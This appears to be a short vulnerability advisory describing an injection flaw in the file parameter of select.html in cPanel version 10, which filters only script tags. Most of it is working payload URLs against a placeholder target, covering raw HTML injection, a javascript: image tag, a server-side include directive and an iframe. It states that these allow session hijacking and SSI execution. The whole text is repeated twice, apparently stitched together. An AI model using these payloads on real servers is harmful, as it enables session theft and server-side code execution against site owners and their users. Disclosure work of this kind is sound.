St.AnGeR
Document Visor..
A new vulnerability was found in Cpanel V.10;
It happen cause the variable *&File* of the *select.html* file (in the
edit-zone) just filter the <script>'s labels and the possibility can
by open to other labels like
*Server Side Include,
*HMTL labels...
*including Javascript expressed in other ways
An attacker can use this vuln. for execute remote scripts in the
browser of clients and take advantage of this for hijacking a session
or execute SSI code in the own server
Exploit & Examples:
[+] Exploit:
http://[Target]:[Port]/[Dir]/x/files/select.html?dir=/&file=
<h1><b>Your code here!!</b></h1>
[+] Javascript:
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IMG
src="javascript:alert('yeah');">
[+] Server Side Inclusion
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<!--#echo
var="HTTP_REFERER" -->
[+] HTML
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IFRAME
SRC="index.html">
It happen cause the variable *&File* of the *select.html* file (in the
edit-zone) just filter the <script>'s labels and the possibility can
by open to other labels like
*Server Side Include,
*HMTL labels...
*including Javascript expressed in other ways
An attacker can use this vuln. for execute remote scripts in the
browser of clients and take advantage of this for hijacking a session
or execute SSI code in the own server
Exploit & Examples:
[+] Exploit:
http://[Target]:[Port]/[Dir]/x/files/select.html?dir=/&file=
<h1><b>Your code here!!</b></h1>
[+] Javascript:
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IMG
src="javascript:alert('yeah');">
[+] Server Side Inclusion
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<!--#echo
var="HTTP_REFERER" -->
[+] HTML
http://[Target]:2082/frontend/x/files/select.html?dir=/&file=<IFRAME
SRC="index.html">